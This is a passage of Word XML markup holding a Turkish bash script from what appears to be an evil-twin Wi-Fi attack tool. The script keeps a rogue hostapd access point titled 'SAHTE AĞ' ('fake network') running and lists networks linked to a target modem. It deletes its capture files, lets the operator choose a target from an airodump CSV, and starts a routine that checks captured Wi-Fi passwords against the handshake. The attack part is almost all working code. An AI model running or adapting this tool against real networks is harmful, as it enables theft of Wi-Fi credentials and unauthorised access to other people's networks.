        <w:t>#######</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD118A2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         f=`ps -A 2&gt;&amp;1 | grep hostapd | awk '{print $4}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAAABA9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                      if [ "$f" = "hostapd" ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A883DB2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="67B3C48E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76887531" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6C04D16F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      echo "YAYINA DEVAM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE37A40" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="24D5A485" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33154FCB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      echo "YENİDEN YAYINA BAŞLANDI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A2F18A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2D193052" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F96ED" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="002DD379" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79168678" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7031AEAA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#####333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06AEC3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          f=`ps -A 2&gt;&amp;1 | grep hostapd | awk '{print $4}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B442F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          duru4=" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622394A4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A420E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4694CAD5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55362C9D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          elif  [ "$duru5" = "$Host_MAC," ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5A57B5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="16E377F9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7E4E4B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1B8E6DFD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         echo "AĞ AÇIK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421E351D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1BE867D6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE44F77" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7AC95015" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#######</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18123D40" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         f=`ps -A 2&gt;&amp;1 | grep hostapd | awk '{print $4}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC49167" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      if [ "$f" = "hostapd" ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260AC508" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0635889F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC6DE87" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3E53C5AC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      echo "YAYINA DEVAM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED32F27" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="76C4B292" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73038F36" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      echo "YENİDEN YAYINA BAŞLANDI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A99F457" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2F3F92D6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F0DE6E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1791EEC4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54818FA5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0970A0DC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#####333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D7CB53" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          f=`ps -A 2&gt;&amp;1 | grep hostapd | awk '{print $4}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319FF9DB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          duru5=" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61412411" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B119464" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C768F9B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6FE787" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4F12050D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          echo "AĞIN FİŞİ ÇEKİLDİ"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0158A9DB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4178D9C6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          a=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54476901" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="52943C21" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD3A5FE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2193B93F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3B3673AA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>###########################################################3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33000911" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="23688F85" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7D569996" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4EF923" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="36B8B86A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo "YAYIN KESİLİYOR"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787885B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="558700B2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>killall hostapd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37328D3F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="296188E6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>rm -rf $DUMP_PATH/elsikisma*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD9F52" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7465D65E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">echo "HEDEF MODEMLE BAĞLANTILI VE DİĞER KOPYA AĞLAR AŞAĞIDA." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DDBC3A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo $duru</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328ABC16" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo $duru2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E689F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo $duru3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E050F6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo $duru4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8EC5DC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo $duru5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63495040" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0E98A475" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo "AĞ $kesilmesayisi KEZ ARANDI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9E3FD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="77DC1F53" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="52AA98C1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>kesilmesayisi=$(($kesilmesayisi+1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B309A3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>######################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7085B723" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="54CF9C8B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3BB570D0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3AB5C01E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69980F98" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="099B2C1D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F80B9C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E2268D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEDE8FC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0FC565" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E146FDB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51141F4A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read yn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0147F5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>case $yn in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28322EF6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1 ) matartodo; CSVDB=dump-01.csv; selection; break;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28406C9C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2 ) matartodo; exitmode; break;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A935CF6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12621D5D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>* ) echo "Bilinmeyen seçenek.Tekrar seç."; conditional_clear ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D4403" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF70F03" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D07E3D1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BBC157" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F4D61C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C6D028" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Parolanın geçerliliğini kontrol edin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642C5C28" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function handshakecheck {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D84B44" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CC3649" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B6C67" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="318A9C1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo &gt; $DUMP_PATH/data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D93BF35" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -n \"0\"&gt; $DUMP_PATH/hit.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181B1059" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "" &gt;$DUMP_PATH/loggg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614EF3BB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE93F20" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>tput civis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B278193" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A29ACE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A197F5E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>minutos=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F380B45" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>horas=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341532E7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>i=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4EA3C8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>timestamp=\$(date +%s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDFDA8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4828F33E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660869DD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD2230B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>segundos=\$i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77973C14" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>dias=\`expr \$segundos / 86400\`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE8B86F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>segundos=\`expr \$segundos % 86400\`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF86D31" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>horas=\`expr \$segundos / 3600\`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E81B5CF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>segundos=\`expr \$segundos % 3600\`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3128AB34" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>minutos=\`expr \$segundos / 60\`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003CBE0A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>segundos=\`expr \$segundos % 60\`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553386F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A8DA02" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ \"\$segundos\" -le 9 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC0653A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>is=\"0\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF84E7E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE80B51" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>is=</w:t>
      </w:r>
    </w:p>
